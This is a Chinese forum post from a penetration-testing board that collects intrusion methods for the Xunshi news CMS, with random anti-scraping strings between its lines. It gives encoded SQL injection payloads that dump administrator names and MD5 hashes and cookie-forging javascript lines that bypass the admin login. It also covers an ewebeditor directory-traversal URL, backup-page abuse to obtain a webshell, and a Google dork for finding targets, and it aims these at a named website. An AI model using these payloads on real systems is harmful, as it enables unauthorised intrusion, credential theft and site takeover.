中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
: I. h. b7 e6 @
; ^6 W2 B0 e1 y; \3 s3 W6 {
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
& g4 Q, a7 c0 z( H" v2 m# N2 W
' r2 r# N4 [7 U
以下本文总结来自黑防去年第9期杂志上的内容...
0 Z+ N: H3 F* `( z0 v
6 Q: D' f% h) |
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
1 f0 ]1 v. t* q- ^$ }
# {1 W1 w& l3 j; u) F" ?
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& I1 T) Q/ V' A
7 b$ I. v, f! l8 J0 ]( K
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
+ x% Q; V7 U8 _5 A! H. X6 |
这里一个注入
9 v8 F$ x: K( ~
. G5 ?: H' i) J1 B2 v) l
效果如图:
8 o3 g; w/ I, S1 n
# V$ P. n. f# h- O, q# d: X: Q& I
( F c X5 C7 {2 e$ j
4 f `* W% X% x) q4 E
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
& Y; O# N" Z7 {" R
: }; ?9 Y# p z3 d+ x. x. L
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
# D x2 A' q5 S& m6 {6 B
( \1 s, r( A- r/ o5 ? D
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
1 K' _+ ^7 W' P+ W9 s
% ?# [+ K3 f2 A# T8 h% ?4 k5 z* c
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
3 f) C3 t- T A- h6 s% }$ O
1 }6 j2 ` K0 L" W8 T
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
% L$ s+ O4 p% [3 }- k0 C! `* T' V) C! \
3 I5 l' G! Q, y
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
, b0 l" ` P U2 }0 x4 M( i
* U' v& ?8 [( v2 K" {
访问这页面来列目录..步骤如下:
4 q: p9 I' z6 k/ r
+ z+ N+ B/ ]; A( y% C" p. F1 m
javascript:alert(document.cookie="admindj=1")
# s: C( Z" Y @' f9 }; P
" W, F( w& t8 Y) e4 M( A5 o& v9 y/ @1 A
http://www.political-security.co ... asp?id=46&dir=../..
; S, E$ o; G1 b: f& s9 [; L
. d% h: v( S" k; [( e
效果如图:
# v' ?7 z0 U2 L- [+ z+ _
/ O' m+ e7 _1 Y$ {6 s) B
; C0 ~7 g% P/ D' t1 w
. l! @3 D; {% T6 O
这样全站目录都能瞧了..找到后台目录..进去..
0 Z- k7 m+ e- Y) l6 S) T1 Y. p
! d/ K8 ^2 J6 y" a
那么进了后台怎么拿shell??上传--备份就ok了..
3 l1 K. }( a8 U- R
9 F" k6 \9 H' v/ m9 ?
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
- z, \. T1 i2 S1 R3 h9 l7 ?& w; u
* a& x. X: y* O$ t+ w
这个我也碰到过一次..你都可以通过列目录来实现..
% m" h* K8 P& N4 z) |$ M
/ q3 E" ^& x4 K4 z9 A
javascript:alert(document.cookie="admindj=1")
9 n/ A6 Q, g6 ? ~; ]
3 Q; L7 [2 [0 B" y: ?
http://www.political-security.co ... p?action=BackupData
& b6 l _# Z/ Y7 |
7 ^* [/ K. s" O. h5 `+ J" [
备份ok..
; Q0 I/ ~/ ]. w* G" q$ D; ~# h+ W
1 s1 i: n9 D& W( D7 H( g
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
4 B0 {5 ?) y+ e z
1 t' z/ ?" {* e& F5 c( P) y. j8 `& f5 \
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
" X2 p. v# P5 j
6 W i% i& ~6 A4 S- O: k& t
然后访问此页面进行注入..步骤如下:
7 `& E! ^3 R4 E0 b5 d3 j9 l( ^
9 A: [0 S" k8 J
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
2 Z/ b( I. ]/ l& F/ q
3 y( t, J0 `5 e. t: h @% @3 o
然后请求admin/admin_chk.asp页面
; l" U+ z: r: g# T2 R$ I A9 j
/ M% q0 K' ~+ b& [5 T3 a& a
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
$ W `/ G6 Z' q3 P$ [- d
$ o( Z! j- W* [% a6 X
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
7 X! @+ A# U g; Q
- Q" N& A% T# t) M' Q3 A* ^% ?
效果如图所示:
% _. f. f3 X" P" b, h$ N. l. I, |" O; V5 \
; `0 X: z& r8 J* g: q1 `
+ t! R- B9 F( ~# l
1 ?4 ?7 D6 k- R: {
讯时漏洞2
/ S' ?# x- B9 K+ N" G h) v
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
8 r- m3 j+ ]# I3 M3 K1 U
5 a- c4 p6 \2 A
1、/admin/admin_news_pl_view.asp?id=1
: a! A& S; O, f H+ c, v& W
//id任意 填入以下语句
2 M2 [8 l4 q& I) N n
; W; O0 w3 S& ^$ q/ `2 w
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
' q7 ]" \3 _) C- f/ c
* F2 H' a- C! o; A3 q; O
/ i. L! E6 K; n4 F1 C/ B4 ]7 l; i- ^
4 T! g2 Q8 X4 t! U9 a1 {, A' ?
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
& F; H, C9 z% D9 Z# Z
; C, q/ w' t1 a( a: I
5 b$ A8 |6 S8 n- T' A# C% O8 z! m
$ A5 Q5 y' E: [: _! k
爆出管理员帐号和密码了
) |3 O- w7 X0 Q+ t: i8 Q
, g7 }! R% U3 E9 B! X' T
& U. E- d& O: C0 ]7 p
0 j( M5 O) v8 R, H
4、cookies进后台
9 T- t" e9 L' V" t
2 [8 c5 b, J8 R
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
/ J& Y$ L! B$ k, b+ x* z' k9 m5 u
' u: r6 U9 v/ n; D, N
- d1 a! P! d7 K' r) s, b
. g2 K1 t$ F( D3 N3 J V6 x
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
) ]# l/ `# c+ ^5 S4 F* P: ~8 D
9 U b4 g, s ? R3 X
r* Z8 g. J8 a. p1 R6 U
( g0 E2 f5 T; x1 C& O0 d
6、后台有上传和备份取SHELL不难。
9 k" U; r6 |. j; l% \' w
- [, j. a- N5 `$ L# t5 U8 G; t
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
# l) L3 X7 a6 h6 i4 R
/ ]7 ?2 Z3 o. B; X- G# ]+ {
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
- ^' H: J0 N4 C* K( a# [* \
2 U. S) n/ U+ I) E/ A9 ?3 v
+ v+ _* @+ y1 N; f) I" y
+ |4 @( e( @2 q4 q. l4 f7 D# @. y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2